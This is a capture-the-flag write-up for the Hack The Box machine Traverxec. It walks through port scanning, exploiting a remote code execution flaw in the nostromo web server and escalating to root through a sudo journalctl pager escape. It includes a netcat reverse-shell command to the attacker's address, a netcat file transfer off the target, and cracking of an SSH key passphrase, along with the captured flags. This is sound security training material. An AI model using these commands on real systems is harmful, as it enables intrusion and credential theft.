Traverxec

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.165 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Sep  1 23:15:53 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.055s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

# Nmap done at Thu Sep  1 23:16:20 2022 -- 1 IP address (1 host up) scanned in 26.53 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80 10.10.10.165 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Sep  1 23:16:35 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/
# Nmap done at Thu Sep  1 23:16:45 2022 -- 1 IP address (1 host up) scanned in 9.44 seconds

As we can see in the nmap report, there is a website on port 80 running nostromo 1.9.6.

Nmap is able to detect the version because of the Server tag in the GET / HTTP response.

curl -I http://10.10.10.165

-I show response headers only.

HTTP/1.1 200 OK
Date: Fri, 02 Sep 2022 11:37:21 GMT
Server: nostromo 1.9.6
Connection: close
Last-Modified: Fri, 25 Oct 2019 21:11:09 GMT
Content-Length: 15674
Content-Type: text/html

Exploitation

If we search for common exploits associated with nostromo 1.9.6, we'll find a Remote Command Execution exploit.

searchsploit nostromo 1.9.6

--------------------------------------------------- ---------------------------------
 Exploit Title                                     |  Path
--------------------------------------------------- ---------------------------------
nostromo 1.9.6 - Remote Code Execution             | multiple/remote/47837.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results

Let's move it to our current directory.

searchsploit -m multiple/remote/47837.py

If we try to execute the command whoami we'll see in the response that we are executing commands as the www-data user.

python2 47837.py 10.10.10.165 80 "whoami"

...
www-data
...

Let's get a proper shell. First, set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Now, let's use the python exploit to execute a command which will send the netcat listener a reverse shell from the victim machine.

python2 47837.py 10.10.10.165 80 "nc -e /bin/bash 10.10.14.9 4444"

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.165] 55522
whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If we start enumerating the system, we'll find the /var/nostromo/conf/.htpasswd file with some password hash.

cat /var/nostromo/conf/.htpasswd

david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

But if we break the hash and get the password, we'll see that the password is not valid for the user david. But if we check the other file in the /var/nostromo/conf/ directory called nhttpd.conf, we'll see at the bottom of the file a home directory called public_www.

cat /var/nostromo/conf/nhttpd.conf

# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

If we check the nostromo documentation, we'll see that the homedirs_public variable is a directory which we can access as the www-data user, and is located under the /home/david/ directory. So, we can't list the home directory of the david user.

ls -l /home/david

ls: cannot open directory '/home/david/': Permission denied

But we can list the /home/david/public_www directory.

ls -l /home/david/public_www

total 8
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area

Under the protected-file-area directory, we can see a compressed file of the id_rsa key file.

ls -la /home/david/public_www/protected-file-area/

total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz

Let's transfer the file to our local machine.

nc -lvnp 6666 > id_rsa.tgz

On the victim machine.

nc 10.10.14.9 6666 < backup-ssh-identity-files.tgz

And decompress it.

tar -xf id_rsa.tgz

We can see what looks like a backup of the david home directory with his id_rsa key.

catn home/david/.ssh/id_rsa

But, as we can see, it is encrypted. Let's try to break it with john. First, let's create the hash for the SSH key.

ssh2john home/david/.ssh/id_rsa > id_rsa_hash

And break it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (home/david/.ssh/id_rsa)     
1g 0:00:00:00 DONE (2022-09-04 02:11) 7.142g/s 1028p/s 1028c/s 1028C/s carolina..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now we could get a shell as the david user, and then we'll be able to grab the user flag.

ssh -i id_rsa david@10.10.10.165

Enter passphrase for key 'home/david/.ssh/id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$ whoami
david
david@traverxec:~$ cat user.txt 
7db0b48469606a42cec20750d9782f3d

If we check the home directory, we'll see the bin directory with a few files.

ls -l /home/david/bin

total 8
-r-------- 1 david david 802 Oct 25  2019 server-stats.head
-rwx------ 1 david david 363 Oct 25  2019 server-stats.sh

Let's execute the script.

/home/david/bin/server-stats.sh

                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Load:  20:23:02 up  1:15,  2 users,  load average: 0.00, 0.00, 0.00
 
Open nhttpd sockets: 1
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Sat 2022-09-03 19:08:03 EDT, end at Sat 2022-09-03 20:23:02 EDT. --
Sep 03 19:08:04 traverxec systemd[1]: Starting nostromo nhttpd server...
Sep 03 19:08:04 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Sep 03 19:08:04 traverxec nhttpd[422]: started
Sep 03 19:08:04 traverxec nhttpd[422]: max. file descriptors = 1040 (cur) / 1040 (max)
Sep 03 19:08:04 traverxec systemd[1]: Started nostromo nhttpd server.

If we check the bash script, we'll see that it executes the journalctl binary with sudo permissions.

cat /home/david/bin/server-stats.sh

#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

As we didn't have to give any password when we executed the script, we can assume that we can execute the journalctl binary as sudo without having to enter any password. If we search for journalctl on the GTFOBins list, we'll see that we can spawn a shell as the root user.

GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions.

https://gtfobins.github.io/

The problem is that we need to have a very small window size in order to spawn the shell.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

And write the following command.

!/bin/bash

We will have a shell as root, and then all we have to do is reap the harvest and take the root flag.

!/bin/bash
root@traverxec:/home/david# whoami
root                                                                                                                                                                                                                                         
root@traverxec:/home/david# cat /root/root.txt                                                                                                                                                                                               
9aa36a6d76f785dfd320a478f6e0d906

Last updated 2 years ago

Was this helpful?